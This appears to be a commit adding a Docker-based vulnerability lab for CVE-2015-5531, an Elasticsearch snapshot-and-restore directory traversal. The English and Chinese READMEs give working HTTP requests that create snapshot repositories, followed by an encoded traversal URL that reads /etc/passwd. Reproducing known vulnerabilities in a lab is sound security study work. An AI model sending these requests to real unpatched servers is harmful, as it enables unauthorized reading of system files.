first commit

elasticsearch/CVE-2015-5531/Dockerfile

@@ -0,0 +1,8 @@
+FROM vulhub/elasticsearch:1.6.0
+
+LABEL maintainer="phithon <root@leavesongs.com>"
+
+COPY elasticsearch.yml ./config/
+
+RUN set -ex \
+    && mkdir -p ./repo

elasticsearch/CVE-2015-5531/README.md

@@ -0,0 +1,85 @@
+# ElasticSearch Snapshot and Restore Directory Traversal (CVE-2015-5531)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+ElasticSearch is a distributed, RESTful search and analytics engine.
+
+In the ElasticSearch versions before 1.6.1, a directory traversal vulnerability exists in ElasticSearch's snapshot and restore functionality, allowing attackers to read arbitrary files on the system.
+
+The conditions for exploiting this vulnerability vary depending on the specific version of the target: in ElasticSearch 1.5.1 and earlier versions, this vulnerability could be triggered without any configuration; in later versions, the `path.repo` configuration must be set in elasticsearch.yml. This configuration specifies a directory that must be writable and serves as the root location for backup repositories. Without this configuration, the snapshot and restore functionality is disabled by default.
+
+References:
+
+- <https://www.exploit-db.com/exploits/38383/>
+- <http://www.freebuf.com/vuls/99942.html>
+
+## Environment Setup
+
+Execute the following commands to build and start an ElasticSearch server 1.6.0:
+
+```
+docker compose build
+docker compose up -d
+```
+
+After the environment starts, you can access the ElasticSearch server at `http://your-ip:9200`.
+
+## Vulnerability Reproduction
+
+### 1. Create a Repository
+
+```
+PUT /_snapshot/test HTTP/1.1
+Host: your-ip:9200
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 108
+
+{
+    "type": "fs",
+    "settings": {
+        "location": "/usr/share/elasticsearch/repo/test" 
+    }
+}
+```
+
+![](1.png)
+
+### 2. Create a Snapshot
+
+```
+PUT /_snapshot/test2 HTTP/1.1
+Host: your-ip:9200
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 108
+
+{
+    "type": "fs",
+    "settings": {
+        "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata" 
+    }
+}
+```
+
+![](2.png)
+
+### 3. Exploit Directory Traversal to Read Files
+
+Send a request to read arbitrary files using directory traversal. For example, to read `/etc/passwd`:
+
+```
+http://your-ip:9200/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
+```
+
+![](3.png)
+
+The file content will be included in the error message (encoded). After decoding, you can obtain the file content:
+
+![](4.png)

elasticsearch/CVE-2015-5531/README.zh-cn.md

@@ -0,0 +1,82 @@
+# ElasticSearch 快照和恢复功能目录穿越漏洞（CVE-2015-5531）
+
+ElasticSearch是一个分布式的RESTful搜索和分析引擎。
+
+在ElasticSearch 1.6.0及更早版本中，存在一个目录穿越漏洞，攻击者可以利用该漏洞读取系统上的任意文件。
+
+根据目标的具体版本，该漏洞的利用条件也存在不同：在ElasticSearch 1.5.1及更早版本中，无需任何配置即可触发该漏洞；在之后的版本中，必须在elasticsearch.yml配置文件中设置`path.repo`参数。此配置指定一个必须可写的目录，作为备份仓库的根位置。如果未配置此参数，快照和恢复功能将默认禁用。
+
+参考链接：
+
+- <https://www.exploit-db.com/exploits/38383/>
+- <http://www.freebuf.com/vuls/99942.html>
+
+## 环境搭建
+
+执行以下命令来启动一个1.6.0版本的ElasticSearch服务器：
+
+```
+docker compose up -d
+```
+
+环境启动后，你可以通过`http://your-ip:9200`访问ElasticSearch服务器。
+
+## 漏洞复现
+
+### 1. 创建仓库
+
+```
+PUT /_snapshot/test HTTP/1.1
+Host: your-ip:9200
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 108
+
+{
+    "type": "fs",
+    "settings": {
+        "location": "/usr/share/elasticsearch/repo/test" 
+    }
+}
+```
+
+![](1.png)
+
+### 2. 创建快照
+
+```
+PUT /_snapshot/test2 HTTP/1.1
+Host: your-ip:9200
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 108
+
+{
+    "type": "fs",
+    "settings": {
+        "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata" 
+    }
+}
+```
+
+![](2.png)
+
+### 3. 利用目录穿越读取文件
+
+发送请求使用目录穿越来读取任意文件。例如，要读取`/etc/passwd`文件：
+
+```
+http://your-ip:9200/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
+```
+
+![](3.png)
+
+文件内容将包含在错误信息中（经过编码）。解码后即可获得文件内容：
+
+![](4.png)

elasticsearch/CVE-2015-5531/docker-compose.yml

@@ -0,0 +1,6 @@
+services:
+ es:
+   build: .
+   ports:
+    - "9200:9200"
+    - "9300:9300"

elasticsearch/CVE-2015-5531/elasticsearch.yml

@@ -0,0 +1 @@
+path.repo: /usr/share/elasticsearch/repo